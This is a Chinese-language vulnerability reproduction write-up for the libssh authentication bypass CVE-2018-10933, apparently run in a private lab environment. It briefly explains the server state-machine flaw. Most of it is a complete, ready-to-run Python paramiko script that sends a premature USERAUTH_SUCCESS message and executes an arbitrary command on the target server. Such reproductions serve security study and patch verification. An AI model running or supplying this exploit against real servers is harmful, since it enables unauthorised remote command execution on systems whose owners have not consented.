libssh 身份验证绕过漏洞(CVE-2018-10933)

libssh 身份验证绕过漏洞(CVE-2018-10933)

libssh 是一个在客户端和服务器端实现 SSHv2 协议的多平台 C 库。在 libssh 的服务器端状态机中发现了一个逻辑漏洞。攻击者可以MSG_USERAUTH_SUCCESS在认证成功之前发送消息。这可以绕过身份验证并访问目标 SSH 服务器。

参考:

漏洞复现

环境启动后,我们可以连接192.168.44.132:2222端口(账号密码myuser:mypassword),就是合法的ssh登录:

image-20211028155658851

参考https://www.seebug.org/vuldb/ssvid-97614 中给出的 POC ,我们可以使用以下脚本来证明漏洞。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
#!/usr/bin/env python3
import sys
import paramiko
import socket
import logging

logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)
bufsize = 2048


def execute(hostname, port, command):
sock = socket.socket()
try:
sock.connect((hostname, int(port)))

message = paramiko.message.Message()
transport = paramiko.transport.Transport(sock)
transport.start_client()

message.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS)
transport._send_message(message)

client = transport.open_session(timeout=10)
client.exec_command(command)

# stdin = client.makefile("wb", bufsize)
stdout = client.makefile("rb", bufsize)
stderr = client.makefile_stderr("rb", bufsize)

output = stdout.read()
error = stderr.read()

stdout.close()
stderr.close()

return (output+error).decode()
except paramiko.SSHException as e:
logging.exception(e)
logging.debug("TCPForwarding disabled on remote server can't connect. Not Vulnerable")
except socket.error:
logging.debug("Unable to connect.")

return None


if __name__ == '__main__':
print(execute(sys.argv[1], sys.argv[2], sys.argv[3]))

可以在目标服务器上执行任意命令,如下所示:

image-20211028160645612

0%